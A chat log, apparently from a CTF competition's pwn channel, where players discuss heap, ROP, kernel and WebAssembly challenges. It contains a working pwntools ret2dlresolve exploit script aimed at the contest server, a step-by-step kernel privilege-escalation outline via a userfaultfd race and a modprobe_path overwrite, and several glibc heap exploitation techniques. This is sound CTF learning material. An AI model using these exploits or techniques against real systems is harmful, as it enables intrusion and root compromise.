#pwn
: o
eh
my exploit fails over remote
is there any timeout for sice sice baby
i suspect that short reads are being problem

admin for flippidy
asleep
he will be up within 2 hours
if he is not I will give him a very severe chastisement
uhh
idk why but my exploit is working on the local environment and fails on remote
could you provide the example docker file for sice sice baby ?
uh
nvm got the flag, I don't know why it is not working locally
it's ubuntu 19.10 running under https://github.com/redpwn/jail
thanks
Bruh
Tfw
my other pwn isnt released yet
Feels bad
ill save it for a different ctf
nowhere in the rules does it say
we can't release challs
between +12 and +24
yeah but thats toxic
quantum_irl
all we guaranteed is none after +24
If u know what ur doing
That's the catch here

@coral heart even a checkfor 8bits alignment :p
Of course, otherwise itd be too easy :)

:pepega:
:O
rpisec op
Yoooo congratz to whoever blooded hashbrown
Dm me your solution cuz I'm just curious
may i see the docker file for babyrop?
well that's for sice sice baby
why do you need the docker file?
wtmoo
same as others, not working remote, wanted to see if i missed something
check your offsets
lol
tnks, ill check
i bet it's m30w
its not
W this means i can release my other pwn
(^:
its easier than sice sice, i promise
M3OW the god of pwn x)
u havent even looked at it lool
what libc version is used on babyrop?
ok, only reason I ask is the classic "works on local but not on remote"
"tfw when"
I have the same problem, i have something that works locally for babyrop but not on remote
this is why u provide dockerfiles smh @coral heart

if you provide dockerfiles you also get "how to use docker"
i mean its better than
if you provide libc you get "how to use custom libc"
ur exploit not working against remote
and u don't know why
poortho is jsut a boomer smh
dockerfile too new fangled
tbh i dont wana provide support for jail base
it already is
o ok
o then it shouldn't be an issue?
like wat are the chances the docker build works for us
but not for competitors
u need a million flags to docker run tho
the author just says to check your offsets
flippidy is making me mald
no its not
flippidy was troll
lmao i was like , wtf
josh gave free gift,

i still don't know what the vuln was 
yeah i dont know either i just got the flag randomly
like i tried doing a few things and it gave me shell out of the blue
kinda trolly
LOL
wtf
:thonkeng
All I remember is that I was playing with the flip option
then I try typing something and it says bash command not found
now do sice sice baby / hashbrown / adult csp
someone blood adult csp pls
so our effort setting up remote doesn't go to waste
fitting chromium into a 100mb zip isn't easy you know
the challs that take the most effort to setup on infra are the ones that get the least solve

sice sice baby is too hard
that means its easier than sanity
i'm just bad

what can i do to convince willwam to take up pwn
too much effort
poortho u should add ur dockerfile
nowo
wait what how did people do flippidy without knowing the vulnerability what
it definitely took some degree of effort for me lmao
bruh what
using ld preload in pwntools makes it so i cant attach to the program with gdb
bruuuuuuuh
dont use LD_PRELOAD, use patchelf with --set-interpreter and --set-rpath instead
i have had the same issue in the past, it is miserable
^ patchelf op
if theres too many libraries and there's too many things to setup, the easiest thing to do is a dockerfile with the correct environment and gdbserver installed
generally this isnt an issue with ctf problems, but it might be if youre actually trying to develop an exploit on a real app with lots of dependencies
can you do this with pwntools?
patchelf is a separate tool
the idea is that it actually modifies the binary, so you can just run stuff in pwntools normally
i see
wait what is rpath supposed to be
usually your local directory
so it doesnt try to load the libc.so.6 installed in your distro
but instead loads the one in the current directory
ah ok
RPATH is basically the directory that the ELF searches for libraries in
also is pwninit fine for making the .so file
blevy
ive never used pwninit but that seems like something that could be interesting
generally each libc version (both number and whether its ubuntu/debian) needs the correct interpreter
patchelf --set-interpreter `pwd`/ld-linux-x86-64.so.2 --set-rpath . <binary> is my goto command
i usually just spin up an ubuntu docker container of the appropriate version and copy the /lib64/ld-linux-x86-64.so.2 from it to get the right linker
oop now i cant even run the binary lmao
if u run what asphyxia posted u have to make sure the libc and the linker are both in the same directory with the binary
also they need to have the correct name
linker needs to be named ld-linux-x86-64.so.2
is there any way to get the correct linker in the directory without screwing up my system
or actually hm
prob can just
thats why i copy from docker container
i have personally found it really hard to find the correct linker version by searching online
yea ok im just gonna use docker cause now it segfaults on run
pulling from docker container is the most convenient way to actually get the file lmao
i usually just do sudo docker create ubuntu:20.04 and then sudo docker cp [container_id]:/lib64/ld-linux-x86-64.so.2 . -L
tho I use ubuntu's package search to figure out which ubuntu version
where container_id is returned by the create command
make absolutely sure its loading the correct libraries and stuff
pwn/babyrop: what machine is it running on? My exploit runs fine locally but getting error on the server
ctf only ends when hk solves both hashbrown and adult csp
If you've already got something to leak addresses it should be pretty easy to find out
ctf never ends
it runs in docker, you are intentionally not given any information on what distribution/version
.
ducker
yes
That's going to be heaps of fun
glad bags 2?
no
glad bags 3
yes
3 sgab dalg
yea this time you only get to flip half a bit at a time
bitflips but on a ternary computer

omg sourcelessrustwasmpwn is up pog

The name is not convincing, not even a bit.
Robin, solve my kernel
ill solve your kernel
much leek many wow
I'm sorry I'm assisting the people who can't refresh the page
Robinnn, take 3rd blood smh
Why I have a feeling you made it too hard?
okay fine sourceless rust wasm pwn
That's better, see commas are important.
well that's why it's source rust wasm pwn
No matter how you put it, it is just comes down to the same :(
solve my pwn pls
yes solve rob's pwn please
^
only cause everyone would be too lazy
to do the rev
actually didn't pernicious
do it w/o source lol
wut?
yea pernicious didn't need src for my kernel chall
he didn't even realize there was src
Who is this pernicious? RPISEC and #1 on pwnable.tw but that's just it about him.
lmaoo
Can someone give me some advice on babyrop? I think I may be missing something
Nobody? :/
.
He is not online...
he will see the messages when hes back online
Okok thx
answered
Shouldve removed src :megajoy:
yudai too good
i have to stop playing the ctf cz i have an important task to do
thank you for the amazing challenges
Maybe next year
Instead of rust wasm
I will have a rust wasm node chromium challenge
hmm is Haskell wasm a thing
Yes
Woah ptryudai
Just solved hashbrown :D awesome challenge!
rob W
Good job
Wanna dm me your solution ?
Yep
@eternal basin you around?
yes
is aslr enabled on babyrop?
yes :)
also to whoever is bashing babyrop at 6 conns/s, you're better off finding a reliable solution
you won't find many pwnables with aslr off, it's 2021 after all
however PIE is disabled on that binary
tfw when you hear cyberpunk used to run without aslr
SiceSice is hard af need to see a write-up after the end of this CTF x)
Very interesting challenge
sice sice baby !
xD @next orbit did u solved it?
yep
someone's gonna need to volunteer a writeup bc I'm pretty sure poortho's too lazy to make one
xD
more restrictions xD
XD
i'm not , maybe other teams who did may do writeup
idk how to explain this in a writeup
glibc heap in a nutshell
something changed with babyrop? I've been working on it, did not change anything on my end but it stopped doing what it was doing
might have been banned for abuse
I was not the one bruteforcing it, I have like 2 requests per minute
hmm dm me
.

mostly new to pwn, completely new to rop
why in the name of the nine hells did you use write instead of puts
pulling my hair out trying to find a gadget
there are more questions about babyrop than any other challs(pwn)
heh
I keep trying to find relatively easier ctfs to take my team to
I went to justctf then this
@analog perch exactly 
@coral heart I hope for a write-up for Sice Sice BAABY!
TRUE
Great challenges deserve great write-ups
writeups are effort zzzzzzzzzzzz
lol lazy
yes
Just the exploit will do
where is the noob stuff??
have you tried adult csp
hackthebox
no i haven't but after looking at it. it would be fine but it seems like i have to make a program just to read the read me file??
you can open the readme file in a text editor
file extensions are a social construct
yea that didnt work so
try babyrop, that is the easiest pwn
none of it is for a noob
LMAO
Just solved babyrop. Is it seriously supposed to be a simple rop? It is the hardest I ever did
good enough!
:c
sometimes when you say 'ayo wtf this shet should work sheeeeiiiiit'
just try it in remote
maybe you're right
prolly bc bash doesn't like the libc
Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!
it tells me this
glibc pwn smh
yea looks like your libc and ld don't match
sourceless wasm timeout :c

uh
my exploit works locally
for sourceless wasm pwn
doesn't work on remote
never mind
solved
my bad

poortho gets outplayed by hk yet again
orz
pls do the last pwn :(
3/7 web tho
we are only 3-4 / 5 people playing rn
hm 5/6 pwn kinda flex tho
no flex
hk
3-4 / 5

@coral heart will make heap task next year where, only alpha numeric characters allowed

:pepega:
@native swift doesnt think sudo is reason
you crashed
but locally I am not
on remote you did
and how do I know why?
check ur offsets or look into common pitfalls with ropchains
stack aligning is fine, just need to find your version of glibc
2.2.5, but which build
oh ye + 4 instructions nice
do you have to read a file for baby rop?
the flag is in flag.txt as per usual with pwn challenges
okay great
@eternal basin i've tried write leak, no success
there is no pop rdx; ret gadget, so i cant call write correctly
try harder
im in the same boat
nah, i will wait for write up, no way to find libc for me
GOOGLE COMMON ROPCHAIN PITFALLS ON REMOTE
W
gg
Adult CSP solved pog
lmao
smh pwntools rop
anyone want to play "lets play code golf... with python exploit"
lmao
inb4 rewriting python bin and solve script is 0 bytes
"do you want it static linked or no"
do you want -O3 stripped or no
here to prove it, i'll release exp after ctf end
why not release it right now
i dunno if the mods would let me
I'd let you
ok rob
aplet pls
i didn't do adult csp
just ask them for the sol to golf
hey look just because I'd let someone post sol early doesn't mean gink can't come in and ban them
not my issue
next time i should add a size limit


on the js payload
Browser pwn on redpwnctf?
ok now it's also waf bypass
bowser pwn
wtmoo leek
mario pwn
uh
windows browser fullchain

w/ 1days
ynaut 0days
cve pwn time?

iOS browser fullchain
tfw rob dropping 0days in ctf
:leek:
dw we already shelled ggl
:thonk:
Just attach script with no comments 
I'm so happy, I am officially a baby. I managed to get babyrop to work .. after .. a .. day
good job!
holy fuck i got it
fuck sice sice pwn, lol, please share hints now
hint: you will get another hint in 7mins
hint: just be poortho and it gives you the flag
i think i understand sice sice but god damn if it isnt a pain to think about and implement
if youre wondering why u cant solve the chall, its bc ur not poortho
tfw ur poortho
if you get the flag and submit it, you will get the points for the chall
can i ask someone about an LD_PRELOAD issue? I thought I had it fixed but apparently not. I also tried patchelf but that crashes too
sure whats the problem @whole epoch
btw if you use LD_PRELOAD with a libc that didn't come from your system, there's a good chance /bin/sh will crash
that's why I use a static linked /bin/sh
yeah that
if you're debugging in gdb and you see "process forked" you're probably fine
from pwn import *
context.binary = e = ELF('./babyrop')   # challenge binary in the current directory
r = ROP(e)
# forge the ELF structures the dynamic resolver reads, so that it resolves "system" and calls it with "sh"
d = Ret2dlresolvePayload(e, symbol="system", args=["sh"])
r.raw(0x40116B)         # gadget address taken from the babyrop binary
r.gets(d.data_addr)     # call gets() to read the forged structures into writable memory
r.ret2dlresolve(d)      # then jump into the resolver with them
p = remote('dicec.tf', 31924)
# 0x48 bytes of padding up to the saved return address, then the chain, then the second line that gets() reads
p.sendline(fit({0x48: r.chain()}) + b'\n' + d.payload)
p.interactive()
babyrop
pepega
almost copied it verbatim from here: https://docs.pwntools.com/en/dev/rop/ret2dlresolve.html
had to fix one small thing tho
remove spaces
Ok can we know the solution to Sice Sice BAAAABYYY! xDD
No heap leak poison null byte
Good question
No partial overwrites
and small chunks
it's doable when allocating relatively larger chunks
by bruteforcing 4bits
I never did it 
solution for hashbrown?
im guessing that for sice sice you had to make a fake chunk and get some pointers that pointed to it using the null byte overflow?
Was the way to leak libc for flippidy to double free to get a pointer to IO_Struct?
@brave lagoon Yep you need to bypass the unlink check
Just by heap feng shui
and the null byte at the end
i realized that was probably what you had to do but it seemed like a massive pain in the ass
yep it is to be honest xD
you can point it to whatever
doesn't really matter
Where did you get to?
@stuck magnet i just leaked one of the symbols in the GOT
Yes but how did u get it to print it
by replacing one of the pointers in the prompt string array
i thought that was a pretty fun idea from the challenge
Yea, was fun I just missed that function and thought I had to overwrite IO stuff to get it to print a leak
its probably something you could do but it would take a hell of a lot of effort
Learned a lot of new stuff tho so rly cool
Even if it prob was impossible to do that way
I wasn't able to make the race condition with delete value and resize reliable, so not too far, now I'll try to understand your exploit
Oh to make the race reliable, you can actually hang the resize thread with the userfaultfd method
you could probably use some kind of fsop for flippidy
but I didn't really look into this much
i was able to get a single arbitrary write on flippidy (and used it to leak libc) but what was the trick to being able to do it again without hitting one of the many malloc/free asserts
I didn't know about that, I tried to synchronize the thread right before add_key and delete_value and then try to execute them in random order but it only worked once in a while
i was dumb and thought that the flippidy double free could only be done with size 1 array and spent hours upon hours trying to figure out how to avoid the fasttop corruption error
Well now you know forever
Yeah just lost 2 days xD
And do CONFIG_FG_KASLR add complexity?
@native swift can you give script
the only way i could find to do it was chaining together tcache poisoning to get leak and then free_hook overwrite to system
which i had to use size 3 array for
Leaks are useless?
Tbf I'm pretty sure unprivileged userfaultfd isn't allowed anymore starting in 5.11 (which was the only version which I could build fg kaslr successfully) so I had to patch the default value to not spoil the challenge in the init file (since seeing uffd = big race hint)
Yea fg kaslr compiles most c functions in its own section and then scrambles on boot
So like per function aslr in a sense
Cant just leak one function address and get all other offsets
Yep but you can know the addresses of the functions in the same header right?
Hmm I don't think so? I didn't actually check lmao
The trick is data and early parts of text aren't affected by fg kaslr
is there a sice sice writeup yet
Any writeup for sourceless wasm blah blah?
Oh ok because I know that the compiler put the functions that share the same code flow into the same header and hence if you get one leak you know the other functions
Thanks that was a good challenge @strange pecan
int overflow -> type confusion -> buffer overflow on stack -> overwrite bss (cuz wasm is weird, not only is bss after the stack but is also writeable even though the string should be read only) to change excalibur to flag
Ahhh
sice sice baby plz
(hashbrown) So after triggering UAF, can we get the address of text/data/etc?
give sice sice writeup please thanks
All I could get was slab addresses
Yes you have to get a useful kernel structure allocated that contains leaks
I used shm_file_data
@strange pecan And do SLUB is exploitable the same way as SLAB in your challenge?
I would assume so? You might have to be careful with the freelist metadata in slub
Hm was babyrop ret2csu intended?
yes
Ah nice
omg nice comments poortho
I noticed the copy_to_user leak fails gracefully on invalid addresses and then located kernel data by starting at 0xffffffffc0000000 and going backwards in steps of 0x100000, until I found a hardcoded string in the first kernel data page
Crude but works
I solved it using this method as well
Nice. What did you do after that? I searched for the modprobe path in the kernel data and overwrote it
Clever
yeah, I also overwrote it and used binfmt to trigger the modprobe
Me too
I wonder if it's possible to overwrite a forked cred structure cause it's 0xa8 in size
And done a real bypass
modprobe_path seems like the easiest way to get root using arb rw
@strange pecan I don't think you can do it in this version of the kernel
I think cred structs have their own kmalloc cache
@strange pecan It got it own cache starting at v 4.15
Physmap spray too hard
That's the hardest part x)
@severe sky You got arbitrary read to search for the modprobe_path right?
Yes
Summary:
- allocate a bunch of entries
- start a resize and block it in copy_from_user after it copied the hashmap
- free all the values
- continue resize
- all values in the hashmap are dangling now
- reclaim values with entries
- locate a value which got reclaimed
- build arbitrary read/write out of that
- find kernel data by starting at 0xffffffffc0000000 and going backwards in steps of 0x100000, until finding hardcoded string in first kernel data page
- search kernel data forwards until finding "/sbin/modprobe"
- overwrite modprobe with path to exploit
- trigger modprobe
Levitatinglion should make writeup too
Agreed x)
@severe sky If modprobe wasn't an option do you think SMEP/AP can be bypassed with RIP control?
My approach would be to locate the init task struct in the kernel data, walk the process list until I find my process and set its uids to 0
learned so much from this ctf, pretty new to pwning, thank you for all decent pwns
That's the way to go
looks at my exploit and sees a ret2dlresolve
xd
kalm: doesn't even have to do any ass work cause all the hard sweaty work has already been done for me
panic: finds that exploit doesn't work on remote
kalm: realizes stack is not 16-byte aligned
@woeful cradle is ret2dlresolve do the same thing as jumping into a system@plt?
yeah
I saw your 4 lines poc xD
Okey x)
basically you screw with the internal elf structures so that the resolver will call whatever function you ask it
well technically it uses dlresolve to jump into system directly, it doesn't use the plt

you just use the plt? (or is it got I forget) entry for dlresolve
well see all plt function jump to some common function
that then jumps to the dl-resolver
You can even call a function without having it's plt address?
the dl-resolver address is located in got
Never used it :p
I didn't know about it x)
I though it was a jump to function@plt and I was doing it manually
@vagrant cypress ok i added the writeup link with my exploit link in the same post in writeups if you were curious
I will surely read it, thanks a lot for your efforts!
When the writeup for Adult CSP would be out?
@proper bone :^)
Writeup for "Adult CSP": https://blog.robertchen.cc/2021/02/07/adult-csp/
just making sure it gets to the ppl who want it
is there any way to get libc debug stuff to work using the provided (non-debug) libc for flippidy
wow thats awesome! never even knew that existed. thanks!
But I believe gef doesn't need them (only pwndbg)
Gg
Any annoying heap massage, I use pwndbg, otherwise gef
jeff
wait what benefits does pwndbg have over gef
what is this #define abuse smh
btw post these in #writeups
wtmoo define caboose
lmao
about chall sice-sice-baby, it seems like i pulled out the solution a bit harder way than intended
you could have 0x100 size of chunk, when you have 0x100 unsortedbin, you allocate 0xe8 and you get chunk allocated with the 0x10 byte overhead
but my solution doesn't depend on that
with my technique it's possible to exploit it even with 0xc8 max size allocation
That's even better
i recalled, the old null byte technique
which worked on glibc 2.23
and then got patched later
it turns out that we can still make just slight changes and it would still work
hk op
no :((
:((
What is the methodology of solving these kind of challenges?
wow c++ pwntools
for the backward consolidation , crafting fake looking double linked list with heap feng shui

Yep for the backward consolidation the challenge was all about satisfying the check
no, it wasn't really
you can try my asis chall
that one is much easier than this
this is spaghetti, tcache spaghetti
require 4bits bruteforce
in this challenge, we can only alloc small sizes
which means this house will not work
btw as far as i remember, rust handles integer overflow by default.
am i wrong or was the binary for rustwasmpwn compiled with some special options?
yeah, idk why it worked
i thought rust "handles" it by defining it to overflow back to 0
no?
I didnt do any special options
Oh wait
It handles it in debug
But not release
I think
yea rust in debug will panic
makes sense
o
there's a special function you need to call for overflowing math iirc
The current status in Rust was decided in RFC 560:
in debug mode, arithmetic (+, -, etc.) on signed and unsigned primitive integers is checked for overflow, panicking if it occurs, and,
in release mode, overflow is not checked and is specified to wrap as two's complement.
ye u have to do a checked_add to have it crash in release
btw @proper bone with AdultCSP, do you know exactly what object gets allocated on top of the freed CAT objects in order to result in a heap + chrome leak?
is it just some noisy allocations happening in the background within chrome?
you don't need to know exactly what object
i just triggered network activity w/ fetch
which was noisy enough to get good leaks
ah alright cool makes sense
~~do you want executable packed with custom packer? ~~
in which I had to find some text large enough to actually make my compression decrease the final size

why tho
haskell pwntools when
Java pwntools when
just ask rob
So it can run on however many billion devices
not released yet
Dang
Looks like I really over complicated my babyrop solution because I didn't know about ret2csu and ret2dl. I controlled the rbx register by running main (which writes 0xd to rbx before the write), and write doesn't overwrite rbx, but gets does (zeros it). So I overwrote gets GOT with a ret gadget, that way rbx wasn't overwritten, and then jumped back to the gets@plt part where it calls the linker to restore the gets GOT so I could continue to the next stage
honestly thats a cooler solution than either of the ret2[stuff] imo, even tho those are good techniques to know
lol thanks
forbidden ctf tactics by pwn chall authors: Write pwn challs in bizarre languages so it gets less solves
forbidden ctf tactics by authors part - 2: Write pwn challs in bizarre arch so no on try to solve the chall
@strange pecan the linux exploitation challenge was awesome ( Even though I couldn't solve it :(... ) Thank you!
bruh
babyrop was more interesting than I thought
I did not know about ret2dl and ret2csu
I'll have to figure them out
What was the intended way to bypass fg_kaslr and everything else in hashbrown? Not sure that our way of doing it was the intended one
ret2csu is basically just normal rop but using gadgets in csu
except a little bit more thinking about what get executed
Also, when we need to control rdx, for that we have to manage one function call, which is generally made to call _fini by people, why don't we just point it to call some ret instruction?
it calls [r15+rbx*8]
if r15+rbx*8 is the address of a ret, then it will call the assembly
people use _init (and _fini i guess) because there are pointers to it in the binary
ooooor you can just call got
you can also do that
you can also chain them together since the second gadget continues into the first
ohhh yeah, I totally missed it
Yeah. finding a pointer to ret instruction is quite difficult
almost impossible
maybe i'll do writeup for sice-sice-baby,
the new technique i used to do null byte attack is kind of interesting
@neon cosmos regarding your writeup for sice-sice-baby
# A is going to be the fake chunk to consolidate backwards to when we trigger the House of Einherjar
# it has to be positioned on an address ending on 0x00 to be able to massage the other pointers correctly,
# hence the 0xe8 allocation on #4 to adjust the heap to align this
# AP is simply another small sized chunk used to consolidate A backwards and keep its pointers in the heap
Here chunk A can be positioned at any address ig, since we can partially overwrite the address(former chunk_size) with 4 bytes, so it wouldn't change the fd_pointer, right?
Correct me if I'm wrong
Hmm I don't think I fully understand what you mean
Part of the needed massage to pass the victim->fd->bk == victim check (and the other way around) requires using the poison null byte to change the pointers of the 2 chunks referenced in the fake chunk that is being consolidated
And because the poison null byte is the only way we can do a partial overwrite without corrupting the rest of the pointers the fake chunk has to be at a 0x00 ending address
That's how I see it anyway, I might be missing something
According to you, here we need the address to be ending with null byte because, when we overwrite size, then one byte of fd will become 0 and hence this check victim->fd->bk == victim will fail
But, we can change size and not change fd pointers LSB, both simultaneously by overwriting only 4 bytes of size(and it will be all good as rest bytes are already 0)
See, we can partially overwrite with 4 bytes
uVar2 = read(0, *(void **)(&ptrs + (uVar1 & 0xffffffff) * 8),
             (ulong)*(uint *)(&size + (uVar1 & 0xffffffff) * 4));
if ((uVar2 & 3) != 0) {
    puts("No partial overwrites :)");
    /* WARNING: Subroutine does not return */
    _exit(0);
}
you don't need to partial overwrite
just 1 byte partial overwrite is enough ( which is always NULL )
because it writes 1 byte off
@next orbit You are talking about overwriting of chunk_size for backward_consolidation, right?
no
i mean yes
but also by partial overwrite, i mean just one byte of the fake chunk headers
Hmm yeah
@next orbit how was possible to backward consolidate without having a chunk with at least 0x100 as its size?
in your poc i mean
i overflow into freed unsortedbin chunk size
since that chunk was unsortedbin , it's next chunk had a prev size and inuse bit cleared,
yep I agree
it won't get updated because we trimmed from 0xXXX -> 0xX00
we allocate the remaining unsorted chunk back
and we have a chunk whose prev_inuse bit is cleared and also has a fake size
^_^
Okeey I'm not skilled enough to get your point but it seems promising x)
Think of a write-up to your poc
i'll make a writeup
That's great then
maybe will make pull request to how2heap,
do they have null byte overflow on new libc without leaks ?
When you have done that, the size of the unsorted bin chunk has been reduced, how can you go up to the next chunk prev_size?
you don't need to
ig we can change that before freeing the chunk present in unsorted bin?
Yep @cobalt yoke I guess you're right
overwrite but just with 4 bytes
to not tamper with the size
oh you mean, to not crash ?
you just fake next chunk
inside that bin
Yep @next orbit I meant how can you modify the prev_size of the next chunk
whoamiT nailed it
idk if how2heap has it but if you have access to > 0x100 allocations it's ez massage without leaks
Clever idea by hk as always x)
and no heap bruteforce
ofc if you don't have a way to get a libc leak it's always gonna be at least a 1/16 bruteforce
@neon cosmos They have it here is the link : https://github.com/shellphish/how2heap/blob/master/glibc_2.31/poison_null_byte.c
Bruteforce of 4 bits
Because the victim chunk two least significant bytes should be NULLs
I tried something similar for sice sice baby but it wasn't possible because of the context
you can't do this in sice sice
only the second to last, and that's where the bruteforce is
the last one isn't aslr dependant and if you're using the poison null byte for the second to last you should be able to overwrite the last byte with any value
oh? I thought you couldn't because no partial overwrites
oh ok haha
yea if you're bruting the 4th heap nibble the massage is a little easier
but it's possible do massage without bruteforce nor largebins
I did that for asis yet another house
for yet another house
I applied the bruteforce of 4 bits
from how2heap
and it worked
i should've also added "No partial overwrites :)"
Ye probably
i dont quite understand why the how2heap poison null byte requires a large bin chunk
can someone explain why you can't do what they're doing with a smallbin chunk?
i know it has the fd_nextsize and bk_nextsize pointers but how do those help when compared to just the usual fd and bk pointers
I haven't looked at that poc but it seems like that poc requires partial overwrite , which is not the case here
@brave lagoon you can do a leakless poison null byte without brute forcing and without largebins
I honestly don't know why the initial ideas involved largebins
but ig that's just what the first pocs used
ye thats why i was curious about it since the technique used for sice sice seems easier
Hi, can someone explain to me why in babyrop when I tried to use a ret2libc I got a segfault cause of the stack alignment or something? Thanks
Thanks
not sure if this is the place to ask, but I kinda want a gentler intro to pwn things than babyrop seemed to be, would anyone be able to vouch for ROPemporium?
ropemporium is pretty good
you can also try high school CTFs
like hsctf, picoctf, and angstromctf
leaving out redpwn smh
nightmare is pretty good too
visit angstromctf.com for the best competition!
but I'm not a high schooler T_T
"I'm not a high schooler. Can I still compete?
Yup! You'll simply need to mark yourself as ineligible for prizes when signing up. Ineligible players will still be able to view challenges, submit flags, and see how they rank compared to other teams."
hm okay
bruh
pwntools has the ret2dl utilities
i used them just now to solve the challenge babyrop
but i have no idea what they do
I am trying to understand but it is very complex compared to ret2csu
I guess I'll try 'exploding' the exploit to see better what happens under the hood

does anyone want to try gunnhacks pwn


the program works tho